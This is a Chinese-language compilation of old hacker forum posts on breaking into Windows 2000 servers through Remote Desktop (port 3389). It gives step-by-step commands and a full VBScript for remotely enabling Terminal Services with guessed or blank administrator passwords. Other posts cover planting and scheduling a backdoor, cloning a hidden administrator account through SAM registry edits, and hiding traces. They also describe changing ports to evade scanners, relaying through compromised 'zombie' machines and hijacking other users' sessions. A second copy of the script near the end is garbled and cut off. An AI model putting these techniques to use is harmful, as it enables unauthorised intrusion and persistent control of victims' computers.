1:在使用后3389要注意的事保护自已噢
记住在本地进入注册表(regedit)输入刚才联了3389的ip,找到并删除相应的项,还有进入后的用户名
2:终端服务中的快捷键
CTRL+ALT+END 打开“Windows 安全”对话框。
ALT+PAGE UP 从左向右在程序之间切换
ALT+PAGE DOWN 从右向左在程序之间切换
ALT+INSERT 按启动顺序来回切换程序。
ALT+HOME 显示“开始”菜单
CTRL+ALT+BREAK 在窗口(如果适用)和全屏显示之间切换客户端
ALT+DELETE 显示窗口的弹出式菜单
CTRL+ALT+减号 (-) 将客户端活动窗口的快照放在“终端”服务器的剪贴板上(与在本地计算机上按
下ALT+PrintScrn 键时的功能相同)
CTRL+ALT+加号 (+) 将整个客户端窗口区域的快照放在“终端”服务器的剪贴板上(与在本地计算机上按下 PrintScrn 键时的功能相同)
注意:
在NEC98 计算机中,这些快捷键在以下两种情况下会有些不同
CTRL+ALT+BREAK由 F12 键代替
CTRL+ALT+END 由 F15 键代替。
3:利用TELNET开放3389端口
如果对方的端口有开放:
telnet 192.168.0.1
输入用户名/密码
C:\>
\\成功进入!!!!
进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.
这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.
好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录
2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录
2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.
如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.
这里还有两种方法
第一种开启的办法:
使用DameWare Mini Remote Control远程连接上,
在"终端服务配置"里,重新启用RDP连接,马上就可以使用3389了.
第二种开启的办法:
修改远程注册表.
比如:
主机IP: 192.168.0.1
已有的帐号和密码: wawa/7788
首先与远程主机建立连接
net use \\192.168.0.1\ipc$ "7788" /user:"wawa"
再打开本机注册表
"开始"==>"运行"==>regedit
在"注册表"下拉菜单中选择"连接网络注册表"
在"计算机名"中输入 \\192.168.0.1
这样就进入了远程主机注册表.
现在我们找到这里:
hkey_local_machine\system\currentcontrolset\control\terminal server\winstations\rdp-tcp\fEnableWinStation
将fEnableWinStation值由0改为1
4:在3389中监视、控制另一个用户的会话
当你用管理员身份登陆时,你可以打开“控制面板”---“管理工具”---“终端服务管理器”,以窗口左边点你的肉鸡的名字,右边窗口就会列出同时连接的用户,那个头像是彩色的用户就是你自己了。在别人的头像上(非本地登陆的,也就是那电脑的原主人)点右键,弹出的菜单有:
连接 \断开 \发送消息 \过程控制 \复位 \状态 \注销
下面我们一条一条来说。
连接
执行它时你将会连接到另一用户的桌面上,系统会强行断开该用户,不会对用户有任何提醒。注意不是注销,就好像我们把终端窗口关闭似的,所以该用户的所有程序都正常运行。这个操作等于你强行霸占了别人的桌面,但如果那人又想要回来行吗?不行的,当他要用该帐号登陆时系统会对他说:“服务已经超出最大允许连接数”,拒绝。注意,这和用同一用户名登陆不一样的,同一用户名可以有很多人用它登陆,但被人挤下来就不能再用了,除非挤你的人又把它空出来。
断开
执行它时系统将会提示:“将中断连接每个所选会话”。???这是什么意思,不知是盖茨们的中文不好,还是我误解了它,我把它理解成:“将中断所选连接的每个会话”。确定以后,该用户就会弹出消息:终端服务器已结束连接。别人只有点关闭来发呆。:)曾在论坛上看到有的朋友说碰到了这条消息,我想,八成是被同行暗算的………。但是他可以重新用该帐号连接的,因为你并没有占用他的位置,你只是把他踢下去而已。并且他连接后桌面还是那个桌面,也就是说,他在运行的程序每个都还好好的。
发送消息
点它后会有个写消息的窗。上栏是标题,你可以更改,也可以用系统默认的;下栏是内容,你想写什么都行,有字数限制的,好像是百来个英文字,懒得数……。点确定后那些字就会以消息框的形式马上出现在对方的桌面上。
远程控制
这可是咱今天的重点,到底行不行呢?点击以后,会出现个退出远程控制的热键设定,(呵,还没上阵就准备如何逃跑)取它默认的---确定。之后它会告诉你“正在建立远程控制会话”,这时候另一个用户的桌面就会出现“某某某正在请求远程控制您的会话,确定吗?”的消息,假如他心甘情愿让您摆布,点了确定后你就和他在同一间小屋使用同一张桌面了……呵,有点温馨的感觉,倘若他是她……:)。这时候两个人都可以进行操作,而你若只是想旁观而已,要先执行“控制面板”---“管理工具”---“计算机管理”,在出现的窗口左栏点“本地用户和组”---“用户”,在右栏里右键点击你想远程观看的用户,点“属性”,在出现的窗体上点“远程控制”,在最下面有两个单选项:“查看用户会话”和“与会话交互”,如果你只想看看就选前者,如果你又要看又要摸的,那就要选后者。当然,最后要点确定来退出那个窗口,然后再进行远程控制。呵,这可太顺利了,但是,要是别人并不让你控制,你也就没辙了,windows会告诉你“远程控制另一个会话的请求被拒绝
。”或是他什么也没做,过了八九秒钟,结果还是如此,电脑和人不一样,不表态是代表着不愿意。:)不知别人有没有霸王硬上弓的方法,若有,记得要跟俺说说。
复位
执行以后,效果和断开一样,但是对方的未保存的数据就全部没有了,就好像我们按了自家电脑的复位键一样,重新起动。它和注销的区别好像是把该用户的状态也一起清零似的,该是这样的吧,我以为。请高手指点。
状态。
也就是该用户的一些数据,挺罗嗦的,自己看看吧。
注销
强迫别人退出这个领地,当然,别人可以马上重来的,除非你改了密码……嘘,不要做得那么绝嘛,让大家都有肉鸡可以使才有趣嘛。
在终端服务管理器里,你还可以终止别人的进程,就连本地登陆的进程也可以杀的,盖茨们的想法果然跟人家不一样……。
OK,总结一下:
当你想霸占别人的成果时,你可以用连接坐享其成---这思想好像不好:)。
当你想捉弄某人时,可以用断开,或是复位注销的,让他爬上爬下忙个不亦乐乎,哈。
而当你要和你的战友共同研究问题时,可以用远程控制;或是有个MM想请教你问题,那么就给她IP、pass,去摆弄你的成果吧。呵,我喜欢后一种情况,可惜到现在都没有过:(。
呵,以上情况在我的机子上(windows2000 pro)通过操作台湾的肉鸡得出,就是不知不同IP的两台电脑结果会不会一样,希望有条件的朋友试一下。若是不一样,别忘了说一声。
5:一次简单的3389入侵过程
一次简单的3389入侵过程
创建时间:2003-02-19
文章属性:原创
文章来源:中国欲网技术论坛--草哲
文章提交:caozhe (cao610_at_yeah.net)
我在网上看到很多很多教你如何如何入侵之类的文章,我觉得对于菜鸟来说根本是看不懂的!
于是呢,我冒出个想法!想写篇简单点的,适合菜鸟的文章!把我学到的跟大家说一下~!
要入侵,我建议你在win2000环境下来*作!
首先,要入侵,你得有工具!我向大家推荐几款软件,也是我一直用的东西!
扫描的X-Scan V2.3、WINNTAutoAttack、流光!
X-Scan我最近很少用了,基本用的都是WINNTAutoAttack,当然,小榕的流光我也经常用!
远程开终端需要一个脚本就可以了,代码请看二楼!保存为*.vbe(我保存的是rots.vbe)
克隆帐户用个psu就可以了~!
OK,比如扫描到了一个有NT弱口令的服务器,IP地址是120.0.0.1,管理员帐户是administrator,密码为空
运行CMD(2000下的DOS),我们给它开终端!
命令如下!
cscript rots.vbe 120.0.0.1 administrator "" 3389 /fr
上面的命令应该可以理解吧?cscript rots.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为120.0.0.1这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启)
因为终端服务器只在win2000 server以上的版本(包括server)才有,PRO当然是不行的,此版本可以检测服务器的版本,如果是PRO的则提示你退出安装!
一切顺利,过会就可以连接到终端了,我们可以ping它,看是否重启,ping 120.0.0.1 -t
安装后用连接工具连接终端!现在我们克隆帐户,呵呵,为了给以后方便嘛!
回到DOS下!我们建立IPC$连接!
net use \\120.0.0.1\ipc$ "" /user:"administrator"
这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
copy psu.exe \\120.0.0.1\admin$\system32
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入
psu -p regedit -i PID
这里解释一下,后面的PID是系统进程winlogon的值,我们在任务栏下点鼠标右键,看任务管理器!
看进程选项卡,找到winlogon的进程,后面的数值就是winlogon的pid值,假设是5458
那么,命令就是这样
psu -p regedit -i 5458
这样直接打开注册表,可以读取本地sam的信息。
打开键值HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users
下面的就是本地的用户信息了!我们要做的是把禁用的guest克隆成管理员权限的帐户!
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names
查看administrator的类型,是if4,再看guest的是if5
好了,知道了类型后,打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4
这个值,双击右侧的F,把里面乱七八糟的字符复制下来,然后打开
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
双击右侧的F,把刚复制的粘贴到里面!
做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
打开CMD,在命令行下输入
net user guest password
这条命令是给guest设置密码,后面的password就是密码
然后输入
net user guest /active:y
这命令是激活guest帐户,然后我们把他禁用
net user guest /active:n
上面的三行命令必须在DOS下执行!
OK了,打开计算机管理,看用户,你们看,guest帐户还是被禁用的~!哈哈,但它已经拥有管理员权限了!
而且并不在管理员组里显示,还可以登陆终端,跟administrator帐户一样的!
注销一下,用guest登陆吧!
打字都打累了~`!真不容易!呵呵~`希望上面的大家能看懂啊!
如果还有地方不明白的话,可以问我,我知道的一定告诉大家!
因为本人也是菜鸟级的,会了点东西就不知道怎么好了,呵呵~`!如果哪里有不对的,还请高手指点啊~!
----------------------------------------------------------------------
以下是开终端的脚本,把它存为*.vbe
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe") then
set objShell=wscript.createObject("wscript.shell")
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
port=wscript.arguments(3)
else
port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of port is error."
wscript.quit
end if
if wscript.arguments.count>4 then
reboot=wscript.arguments(4)
else
reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator")
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem")
for each objinstoscaption in colinstoscaption
if instr(objinstoscaption.caption,"Server")>0 then
wscript.echo "OK!"
else
wscript.echo "OS type is "&objinstoscaption.caption
outstreem.write "Do you want to cancel setup?[y/n]"
strcancel=instreem.readline
if lcase(strcancel)<>"n" then wscript.quit
end if
next
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov")
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
outstreem.write "Now, reboot target...."
strwqlquery="select * from win32_operatingsystem where primary='true'"
set colinstances=objswbemservices.execquery(strwqlquery)
for each objinstance in colinstances
objinstance.win32shutdown(flag)
next
showerror(err.number)
else
wscript.echo "You need to reboot target."&vbcrlf&"Then,"
end if
wscript.echo "You can logon terminal services on "&port&" later. Good luck!"
function showerror(errornumber)
if errornumber Then
wscript.echo "Error 0x"&cstr(hex(err.number))&" ."
if err.description <> "" then
wscript.echo "Error description: "&err.description&"."
end if
wscript.quit
else
wscript.echo "OK!"
end if
end function
function usage()
wscript.echo string(79,"*")
wscript.echo "ROTS v1.05"
wscript.echo "Remote Open Terminal services Script, by 草哲"
wscript.echo "Welcome to visite
www.5458.net"
wscript.echo "Usage:"
wscript.echo "cscript "&wscript.scriptfullname&" targetIP username password [port] [/r|/fr]"
wscript.echo "port: default number is 3389."
wscript.echo "/r: auto reboot target."
wscript.echo "/fr: auto force reboot target."
wscript.echo string(79,"*")&vbcrlf
end function
中国欲网技术论坛:草哲
root注:本文写得较为简单,作为让初学网络安全者了解黑客攻击流程和方法的文章,还是有一定价值的。
6:通过代理使用3389,radmin的方法
言归正传!
以前一直想找到通过代理使用3389,radmin等远程控制工具的方法(像SocksCap32等,是不是还有其他方法我没找到?),但一直没成功过(是不是哪些地方没用对?谁知道请告诉我),netstat -n显示的还是直接连到肉机IP的,为了安全起见,所以一直以来都是用通过3389先到跳板,再从跳板肉机3389到目标肉机!有时连续使用3-4个跳板,3389开了好几个,一不注意就搞错跳板顺序了!:)
开工:
1.工具准备:portmap1.6,代理肉机,3389客户端登录器(推荐XP的),Radmin等
2. 在本机安装好portmap1.6,设置一个新映射组:
在输入ip填入本机自已的IP(127.0.0.1或公网Ip),端口随便填一个(如3388),
在输出IP填入你要xx作的肉机目标IP,端口填入所开终端服务端口(如3389),
在使用sock5代理服务器前打钩(我所知道的端口映射软件中,能支持代理的只有portmap,其他的没用过,所以不清楚,如果还有其他类似的软件,告诉我?)
填入能用的sock5代理服务器IP和端口(最好是自已做的肉机代理,因为如果你想二级跳的话),设置完毕!
3.启动映射组!
4.打开mstsc.exe(不知道是什么?这个别问我了,论坛找找看?),在地址栏输入刚才你设置的输入IP和端口3388,(现在知道为什么推荐用XP版的mstsc.exe了吗?可以自定义端口的!),点连接!OK!
5.用netstat -n 看看,绝对是通过代理连到肉机3389的!
6.注意:此方法只适用于本机为98,2000的!XP不行,会显示:客户端无法连接,你已连接到本机主控台,无法建立新的控制台会话!(怎么会这样?)
7.此方法同样适用于Radmin,DameWare等远程图形控制软件的代理使用!其中:Radmin支持直接通过Radmin肉机代理,但不能通过SocksCap32代理,DameWare支持SocksCap32和本方法代理!Pcanywhere我没试!
8.以上方法虽是复杂了点,但比较起通过3389再3389的方法,我觉得还是要好一些!
今天测试时我用这个方法,从单位的内部网中通过3级sock5代理,远程登上了我的台湾3389肉机!以前一直没做到,呵呵!
NetFox
2003年10月28日10:50
7:开3389的6种方法
怎么样开3389端口,这里我把他们总结一下,很全面,希望对你有用: 1,打开记事本,编辑内容如下: echo [Components] > c:\sql echo TSEnable = on >> c:\sql sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q 编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05 地址:
www.netsill.com/rots.zip 使用方法: 在命令行方式下使用windows自带的脚本宿主程序c *** .exe调用脚本,例如: c:\>c *** ROTS. *** <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 服务端口: 设置终端服务的服务端口。默认是3389。 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。 使用/fr表示强制重起目标。(如果/r不行,可以试试这个) 使用此参数时,端口设置不能忽略。 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空 运行CMD(2000下的DOS),我们给它开终端! 命令如下! c *** reg.vbe 222.222.222.222 administrator "" 3389 /fr 上面的命令应该可以理解吧?c *** reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以/r,这是普通重启) 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。 因为pro版不能安装终端服务。 如果你确信脚本判断错误,就继续安装好了。 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。 3,下载3389自动安装程序-djshao正式版5.0 地
www.netsill.com/djshao.zip 说明: 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务! 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持中日韩繁四个版本的win2000服务器版! 5,下载DameWare NT Utilities 3.66.0.0 注册版地
www.netsill.com/dwmrcw36600.zip 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。复制启动后出现对方桌面。在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。 还可以使用注册表..远程连接...开对方3389
第一种方法:使用的工具: 1:ipcscan扫描器 2:终端服务连接工具xpts.exe(WIN 2000/XP 终端连接程序. 内附有COPY 文件的补丁. 格式 IP:Port ) 3:开终端的脚本rots.vbs(灰色轨迹zzzevazzz的作品) 4:cscript (在system32文件夹下;98操作系统可能没有二:步骤: 1:用ipcscan扫描弱口令(你们可以自己扫,我也扫到一些弱口令主机.演实时间我在论坛上再发) 2:用rots.vbs开启终端服务 说明 cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项] 格式 cscript.exe rots.vbs ip user userpass port /r 或者 cscript.exe rots.vbs ip user userpass port /fr 三:常见问题: 1:脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。因为pro版不能安装终端服务.如果你确信脚本判断错误,就继续安装好了. 2:可能会出现:Conneting 202.202.202.202 ....Error0x80070776 .Error description: 没有发现指定的此对象导出者,这个还是放弃吧. 3:可能会连接不上,请用这个格式127.0.0.1:1818 1818是刚才开的端口. 第二种方法: 进入后:TELNET上去! c:\>echo [Components] > c:\rock c:\>echo TSEnable = on >> c:\rock c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q 或者! c:\>echo [Components] > d:\wawa c:\>echo TSEnable = on >> d:\wawa c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:d:\wawa /q 等会自动启后就OK 或者:在本地利用DOS命令edit建立.bat后缀批处理文件(文件名随意) echo [Components] > c:\sql echo TSEnable = on >> c:\sqlsysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q net use \\ip地址\ipc$ 密码 /user:用户名(一般默认:administrator) 利用at time 获取对方服务器时间。 copy 路径:\xxx.bat \\ip地址\$c:\winnt at time 00:00:00 xxx.bat 服务器执行命令后,服务器将重新启动,利用3389登陆就OK了! 第三种方法:进入后,再次检查终端组件是否安装: c:\>query user 这个工具需要安装终端服务. 这样就进一步确定了组件没有被安装.如果返回: USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME >w1 console 0 运行中 . 2002-1-12 22:5 \\类似这样的信息,可能组件就已安装. 好!都清楚了,可以开始安装了. --------------------------------------------------- C:\>dir c:\sysoc.inf /s //检查INF文件的位置 c:\WINNT\inf 的目录 2000-01-10 20:00 3,770 sysoc.inf 1 个文件 3,770 字节 ----------------------------------------------------- C:\> dir c:\sysocmgr.* /s //检查组件安装程序 c:\WINNT\system32 的目录 2000-01-10 20:00 42,768 sysocmgr.exe 1 个文件 42,768 字节 ----------------------------------------------------- c:\>echo [Components] > c:\rock c:\>echo TSEnable = on >> c:\rock //这是建立无人参与的安装参数 c:\>type c:\rock [Components] TSEnable = on //检查参数文件 ------------------------------------------------------ c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\rock /q ----------------------------------------------------- 这一条就是真正安装组件的命令. 以上这条命令没有加/R参数,主机在安装完后自动重起. 如若加了/R参数主机就不会重起. 如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时, 3389终端服务就已经开启.你就可以连上去了. 问题和建议: A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方 的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒. B 一次不行可以再试一次,在实际中很有作用. C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼, 而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议. 第四种方法: C:\Documents and Settings\shanlu.XZGJDOMAIN>net use \\218.22.155.*\ipc$ "" /us er:administrator----------------连接成功! 命令成功完成。 C:\Documents and Settings\shanlu.XZGJDOMAIN>copy wollf.exe \\218.22.155.*\admi n$------------------------------拷贝wollf.exe到目标计算机的admin$目录 已复制 1 个文件。 C:\Documents and Settings\shanlu.XZGJDOMAIN>copy hbulot.exe \\218.22.155.*\adm in$-----------------------------拷贝hbulot.exe到目标计算机的admin$目录 已复制 1 个文件。 C:\Documents and Settings\shanlu.XZGJDOMAIN>net time \\218.22.155.* \\218.22.155.* 的当前时间是 2002/12/1 上午 06:37 命令成功完成。 C:\Documents and Settings\shanlu.XZGJDOMAIN>at \\218.22.155.* 06:39 wollf.exe 新加了一项作业,其作业 ID = 1--指定wollf.exe在06:39运行 ------------------------------------------------------------------------------------------ 说明: wollf.exe是一个后门程序,很多高手都喜欢nc或者winshell,不过我对他情有独钟!在这里我只介绍与本文内 容有关的命令参数,它的高级用法不做补充。 hbulot.exe是用于开启3389服务,如果不是server及以上版本,就不要运行了。因为pro版不能安装终端服务。 2分钟后...... ------------------------------------------------------------------------------------------ C:\Documents and Settings\shanlu.XZGJDOMAIN>wollf -connect 218.22.155.* 7614 "Wollf Remote Manager" v1.6 Code by wollf,
http://www.xfocus.org ------------------------------------------------------------------------------------------ 说明: 使用wollf连接时要注意wollf.exe要在当前目录,它的连接命令格式:wollf -connect IP 7614 7614是wollf开放的端口。如果显示如上,说明你已经连接成功,并具有管理员administrator权限。 ------------------------------------------------------------------------------------------ [server@D:\WINNT\system32]#dos Microsoft Windows 2000 [Version 5.00.2195] (C) 版权所有 1985-2000 Microsoft Corp. ------------------------------------------------------------------------------------------ 说明: 输入dos,你就会进入目标机的cmd下,这时同样具有administrator权限。 ------------------------------------------------------------------------------------------ D:\WINNT\system32>cd.. cd.. D:\WINNT>dir h*.* dir h*.* 驱动器 D 中的卷没有标签。 卷的序列号是 1CE5-2615 D:\WINNT 的目录 2002-11-27 03:07
Help 2002-09-10 12:16 10,752 hh.exe 2002-10-01 08:29 24,576 HBULOT.exe 2 个文件 35,328 字节 1 个目录 9,049,604,096 可用字节 D:\WINNT>hbulot hbulot ------------------------------------------------------------------------------------------ 说明: 因为我们把HBULOT.exe放到目标机的admin$下的,所以先找到它,以上是文件的存放位置。 ========================================================================================== D:\WINNT>exit exit Command "DOS" succeed. [server@D:\WINNT\system32]#reboot Command "REBOOT" succeed. [server@D:\WINNT\system32]# Connection closed. ------------------------------------------------------------------------------------------ 说明: 由dos退到wollf的连接模式下用exit命令,HBULOT.exe运行后需重新启动方可生效,这里wollf自带的REBOOT 命令,执行过在5秒后你就会失去连接。启动完毕后检查一下3389端口是否开放,方法很多,superscan3扫一下 。这时候你就可以登陆了。如果没有开放3389那就不是server及以上版本,就不要运行了。因为pro版不能安装 终端服务。 到这里,你已经拥有3389肉鸡了!但是会不会被别的入侵者发现呢?下面所教的就是怎么让3389只为你服务! 我们现在使用的3389登陆器有两种版本,一种是2000/98,一种是XP。二者区别呢?前者使用的默认端口3389对 目标,后者默认的也是3389端口,但是它还支持别的端口进行连接!所以呢......我们来修改3389的连接端口 来躲过普通扫描器的扫描!修改方法如下: 修改服务器端的端口设置 ,注册表有2个地方需要修改。 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] PortNumber值,默认是3389,修改成所希望的端口,比如1314 第二个地方: [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] PortNumber值,默认是3389,修改成所希望的端口,比如1314 现在这样就可以了。重启系统吧。 注意:事实上,只修改第二处也是可以的。另外,第二处的标准联结应该是 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\ 表示具体的某个RDP-TCP连结。 重启过后,看看端口有没有改。 小技巧:修改注册表键值时,先选择10进制,输入你希望的端口数值,再选择16进制,系统会自动转换。
8:这里是一些关于3389的问题
如何从弱口令到3389只为你服务!
用扫描器扫一段国外的ip段,因为我很菜,我一直都用的winntautoattack2.6
下载地址:
http://www.xixidns.com/soft/WINNTAutoAttack2.6.rar
这东东你都不会,我就没办法了,不过还可以用流光,xcan2.3
和一些别的工具
比如,扫到了一个ip:127.0.0.1 用户名:administrator密码 ()
新建一个文本gangqin46.txt(内容):
on error resume next
set outstreem=wscript.stdout
set instreem=wscript.stdin
if (lcase(right(wscript.fullname,11))="wscript.exe" then
set objShell=wscript.createObject("wscript.shell"
objShell.Run("cmd.exe /k cscript //nologo "&chr(34)&wscript.scriptfullname&chr(34))
wscript.quit
end if
if wscript.arguments.count<3 then
usage()
wscript.echo "Not enough parameters."
wscript.quit
end if
ipaddress=wscript.arguments(0)
username=wscript.arguments(1)
password=wscript.arguments(2)
if wscript.arguments.count>3 then
port=wscript.arguments(3)
else
port=3389
end if
if not isnumeric(port) or port<1 or port>65000 then
wscript.echo "The number of port is error."
wscript.quit
end if
if wscript.arguments.count>4 then
reboot=wscript.arguments(4)
else
reboot=""
end if
usage()
outstreem.write "Conneting "&ipaddress&" ...."
set objlocator=createobject("wbemscripting.swbemlocator"
set objswbemservices=objlocator.connectserver(ipaddress,"root/cimv2",username,password)
showerror(err.number)
objswbemservices.security_.privileges.add 23,true
objswbemservices.security_.privileges.add 18,true
outstreem.write "Checking OS type...."
set colinstoscaption=objswbemservices.execquery("select caption from win32_operatingsystem"
for each objinstoscaption in colinstoscaption
if instr(objinstoscaption.caption,"Server">0 then
wscript.echo "OK!"
else
wscript.echo "OS type is "&objinstoscaption.caption
outstreem.write "Do you want to cancel setup?[y/n]"
strcancel=instreem.readline
if lcase(strcancel)<>"n" then wscript.quit
end if
next
outstreem.write "Writing into registry ...."
set objinstreg=objlocator.connectserver(ipaddress,"root/default",username,password).get("stdregprov"
HKLM=&h80000002
HKU=&h80000003
with objinstreg
.createkey ,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache"
.setdwordvalue HKLM,"SOFTWARE\Microsoft\Windows\CurrentVersion\netcache","Enabled",0
.createkey HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer"
.setdwordvalue HKLM,"SOFTWARE\Policies\Microsoft\Windows\Installer","EnableAdminTSRemote",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server","TSEnabled",1
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermDD","Start",2
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Services\TermService","Start",2
.setstringvalue HKU,".DEFAULT\Keyboard Layout\Toggle","Hotkey","1"
.setdwordvalue HKLM,"SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp","PortNumber",port
end with
showerror(err.number)
rebt=lcase(reboot)
flag=0
if rebt="/r" or rebt="-r" or rebt="\r" then flag=2
if rebt="/fr" or rebt="-fr" or rebt="\fr" then flag=6
if flag<>0 then
outstreem.write "Now, reboot target...."
